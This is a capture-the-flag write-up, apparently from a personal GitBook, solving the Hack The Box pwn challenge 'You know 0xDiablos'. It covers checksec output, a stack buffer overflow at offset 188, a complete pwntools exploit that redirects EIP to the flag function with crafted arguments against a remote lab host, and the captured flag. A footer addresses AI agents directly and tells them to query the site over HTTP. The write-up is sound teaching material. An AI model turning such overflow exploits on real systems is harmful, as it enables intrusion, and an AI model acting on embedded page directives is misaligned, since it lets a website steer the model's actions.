# You know 0xDiablos {% file src="" %} ## Challenge Description : ``` I missed my flag ``` ### Basic File Enumeration : this is a 32 bit binary not stripped which will make reversing this binary easier since the function names will not be obfuscated, the binary has no protections ```bash ┌──(kali㉿kali)-[~/hackthebox/pwn/diablos] └─$ file vuln vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=ab7f19bb67c16ae453d4959fba4e6841d930a6dd, for GNU/Linux 3.2.0, not stripped ┌──(kali㉿kali)-[~/hackthebox/pwn/diablos] └─$ checksec --file=vuln [*] '/home/kali/hackthebox/pwn/diablos/vuln' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments ``` let's open the binary using ghidra we have 3 function

the main function is not vulnerable but the vuln function is clearly vulnerable to BOF since it doesn't check the size of the input given by the user

and flag function is the win function but it has parameters which are compared to hex values and if the comparaison is true it will print the flag.txt file output

so we will overflow the buffer and overwrite the EIP with the address of the flag function and overwrite the flag function parameters with correct values, since this is 32 bit archeticture binary the function parameters are bove the Return Pointer ### Find Offset to EIP : we can find it using gdb or just using ghidra by calculating the offset between the return and vunerable local variable

so the offset is 188 (0xbc -> 188) ### Exploit : ```python from pwn import * # Set up pwntools for the correct architecture exe = './vuln' elf = context.binary = ELF(exe, checksec=False) context.log_level = 'debug' #=========================================================== # EXPLOIT GOES HERE #=========================================================== # io = process(exe) io = remote('83.136.249.57', 47937) offset = 188 # offset to EIP payload = flat( offset * b'A', elf.functions.flag, 0, # Return Pointer -0x21524111, #param1 -0x3f212ff3 #param2 ) io.sendline(payload) io.interactive() ``` now let's execute the exploit

### Flag : ``` HTB{0ur_Buff3r_1s_not_healthy} ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sayonara.gitbook.io/writeups/hackthebox/challenges/pwn/you-know-0xdiablos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.